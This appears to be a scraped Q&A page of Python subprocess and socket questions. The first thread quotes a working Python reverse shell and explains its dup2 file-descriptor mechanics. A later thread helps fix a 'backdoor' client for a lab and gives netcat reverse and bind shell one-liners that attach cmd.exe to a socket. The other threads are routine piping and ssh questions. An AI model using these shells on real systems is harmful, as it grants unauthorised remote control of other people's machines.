Understanding how file descriptos in Python work - python

So I have found a following code for reverse shell in python
import socket, subprocess, os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.11.xxx",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
This code basically opens a reverse connection to some remote listener under "10.10.11.xxx".
I do not how the input/output from subprocess call is transferred to socket via file descriptors.
Everything else until that is clear:
Socket is created
Conenction is established
socket file descriptors get copied into standard file descriptors using dup2()
But I do not get it how does the system know that it needs to pipe data to those sockets.
Thanks!

That's what os.dup2() does.
os.dup2(s.fileno(), 0)
makes file descriptor 0 refer to the socket. FD 0 is standard input, so when the shell reads its input, it will read from the socket.
os.dup2(s.fileno(), 1)
makes file descriptor 1 refer to the socket. FD 1 is standard output, so when the shell prints something, it will be sent to the socket.
FD 2 is standard error, so error messages will also be written to the socket.
All these descriptors will be inherited by child processes that the shell spawns, so programs that are run from the reverse shell will read and write the socket.

Related

Suppress output of subprocess

I want to use the subprocess module to control some processes spawned via ssh.
By searching and testing I found that this works:
import subprocess
import os
import time
node = 'guest#localhost'
my_cmd = ['sleep','1000']
devnull = open(os.devnull, 'wb')
cmd = ['ssh', '-t', '-t', node] + my_cmd
p = subprocess.Popen(cmd, stderr=devnull, stdout=devnull)
while True:
time.sleep(1)
print 'Normal output'
The -t -t option I provide allows me to terminate the remote process instead of just the ssh command. But this, also scrambles my program output as newlines are no longer effective making it a long and hard to read string.
How can I make ssh not affecting the formatting of the python program?
Sample output:
guest:~$ python2 test.py
Normal output
Normal output
Normal output
Normal output
Normal output
Normal output
Normal output
(First ctrl-c)
Normal output
Normal output
Normal output
(Second ctrl-c)
^CTraceback (most recent call last):
File "test.py", line 13, in <module>
time.sleep(1)
KeyboardInterrupt
Ok, the output is now clear. I do not exactly know why, but the command ssh -t -t puts the local terminal in raw mode. It makes sense anyway, because it is intended to allow you to directly use curses programs (such as vi) on the remote, and in that case, no conversion should be done, not even the simple \n -> \r\n that allows a simple new line to leave the cursor on first column. But I could not find a reference on this in ssh documentation.
It (-t -t) allows you to kill the remote process because the raw mode let the Ctrl + C to be sent to the remote instead of being processed by the local tty driver.
IMHO, this is design smell, because you only use a side effect of the pty allocation to pass a Ctrl + C to the remote and you suffer for another side effect which is the raw mode on local system. You should rather process the standard input (stdinput = subprocess.PIPE) and explicitely send a chr(3) when you input a special character on local keyboard, or install a signal handler for SIG-INT that does it.
Alternatively, as a workaround, you can simply use something like os.system("stty opost -igncr") (or better its subprocess equivalent) after starting the remote command to reset the local terminal in an acceptable mode.

python subprocess stdin.write a string error 22 invalid argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

How to pipe python socket to a stdin/stdout

I need to write an app to contact to a server. After sending a few messages it should allow the user to interact with the server by sending command and receive result.
How should I pipe my current socket so that the user can interact with the server without the need of reading input and writing output from/to stdin/stdout ?
You mean like using netcat?
cat initial_command_file - | nc host:port
the answer is, something needs to read and write. In the sample shell script above, cat reads from two sources in sequence, and writes to a single pipe; nc reads from that pipe and writes to a socket, but also reads from the socket and writes to its stdout.
So there will always be some reading and writing going on ... however, you can structure your code so that doesn't intrude into the comms logic.
For example, you use itertools.chain to create an input iterator that behaves similarly to cat, so your TCP-facing code can take a single input iterable:
def netcat(input, output, remote):
"""trivial example for 1:1 request-response protocol"""
for request in input:
remote.write(request)
response = remote.read()
output.write(response)
handshake = ['connect', 'initial', 'handshake', 'stuff']
cat = itertools.chain(handshake, sys.stdin)
server = ('localhost', 9000)
netcat(cat, sys.stdout, socket.create_connection(server))
You probably want something like pexpect. Basically you'd create a spawn object that initates the connection (e.g. via ssh) then use that object's expect() and sendline() methods to issue the commands you want to send at the prompts. Then you can use the interact() method to turn control over to the user.

Using file descriptors to communicate between processes

I have the following python code:
import pty
import subprocess
os=subprocess.os
from subprocess import PIPE
import time
import resource
pipe=subprocess.Popen(["cat"], stdin=PIPE, stdout=PIPE, stderr=PIPE, \
close_fds=True)
skip=[f.fileno() for f in (pipe.stdin, pipe.stdout, pipe.stderr)]
pid, child_fd = pty.fork()
if(pid==0):
max_fd=resource.getrlimit(resource.RLIMIT_NOFILE)[0]
fd=3
while fd<max_fd:
if(fd not in skip):
try:
os.close(fd)
except OSError:
pass
fd+=1
enviroment=os.environ.copy()
enviroment.update({"FD": str(pipe.stdin.fileno())})
os.execvpe("zsh", ["-i", "-s"], enviroment)
else:
os.write(child_fd, "echo a >&$FD\n")
time.sleep(1)
print pipe.stdout.read(2)
How can I rewrite it so that it will not use Popen and cat? I need a way to pass data from a shell function running in the interactive shell that will not mix with data created by other functions (so I cannot use stdout or stderr).
Ok, I think I've got a handle on your question now, and see two different approaches you could take.
If you absolutely want to provide the shell in the child process with an already-open file descriptor, then you can replace the Popen() of cat with a call to os.pipe(). That will give you a connected pair of real file descriptors (not Python file objects). Anything written to the second file descriptor can be read from the first, replacing your jury-rigged cat-pipe. (Although "cat-pipe" is fun to say...). A socket pair (socket.socketpair()) can also be used to achieve the same end if you need a bidirectional pair.
Alternatively, you could simplify your life even further by using a named pipe (aka FIFO). If you aren't familiar with the facility, a named pipe is a uni-directional pipe located in the filesystem namespace. The os.mkfifo() function will create the pipe on the filesystem. You can then open the pipe for reading in your primary process and open it for writing / direct output to it from your shell child process. This should simplify your code and open the option of using an existing library like Pexpect to interact with the shell.

Python Popen, closing streams and multiple processes

I have some data that I would like to gzip, uuencode and then print to standard out. What I basically have is:
compressor = Popen("gzip", stdin = subprocess.PIPE, stdout = subprocess.PIPE)
encoder = Popen(["uuencode", "dummy"], stdin = compressor.stdout)
The way I feed data to the compressor is through compressor.stdin.write(stuff).
What I really need to do is to send an EOF to the compressor, and I have no idea how to do it.
At some point, I tried compressor.stdin.close() but that doesn't work -- it works well when the compressor writes to a file directly, but in the case above, the process doesn't terminate and stalls on compressor.wait().
Suggestions? In this case, gzip is an example and I really need to do something with piping the output of one process to another.
Note: The data I need to compress won't fit in memory, so communicate isn't really a good option here. Also, if I just run
compressor.communicate("Testing")
after the 2 lines above, it still hangs with the error
File "/usr/lib/python2.4/subprocess.py", line 1041, in communicate
rlist, wlist, xlist = select.select(read_set, write_set, [])
I suspect the issue is with the order in which you open the pipes. UUEncode is funny is that it will whine when you launch it if there's no incoming pipe in just the right way (try launching the darn thing on it's own in a Popen call to see the explosion with just PIPE as the stdin and stdout)
Try this:
encoder = Popen(["uuencode", "dummy"], stdin=PIPE, stdout=PIPE)
compressor = Popen("gzip", stdin=PIPE, stdout=encoder.stdin)
compressor.communicate("UUencode me please")
encoded_text = encoder.communicate()[0]
print encoded_text
begin 644 dummy
F'XL(`%]^L$D``PL-3<U+SD])5<A-52C(24TL3#4`;2O+"!(`````
`
end
You are right, btw... there is no way to send a generic EOF down a pipe. After all, each program really defines its own EOF. The way to do it is to close the pipe, as you were trying to do.
EDIT: I should be clearer about uuencode. As a shell program, it's default behaviour is to expect console input. If you run it without a "live" incoming pipe, it will block waiting for console input. By opening the encoder second, before you had sent material down the compressor pipe, the encoder was blocking waiting for you to start typing. Jerub was right in that there was something blocking.
This is not the sort of thing you should be doing directly in python, there are eccentricities regarding the how thing work that make it a much better idea to do this with a shell. If you can just use subprocess.Popen("foo | bar", shell=True), then all the better.
What might be happening is that gzip has not been able to output all of its input yet, and the process will no exit until its stdout writes have been finished.
You can look at what system call a process is blocking on if you use strace. Use ps auxwf to discover which process is the gzip process, then use strace -p $pidnum to see what system call it is performing. Note that stdin is FD 0 and stdout is FD 1, you will probably see it reading or writing on those file descriptors.
if you just want to compress and don't need the file wrappers consider using the zlib module
import zlib
compressed = zlib.compress("text")
any reason why the shell=True and unix pipes suggestions won't work?
from subprocess import *
pipes = Popen("gzip | uuencode dummy", stdin=PIPE, stdout=PIPE, shell=True)
for i in range(1, 100):
pipes.stdin.write("some data")
pipes.stdin.close()
print pipes.stdout.read()
seems to work

Categories

Resources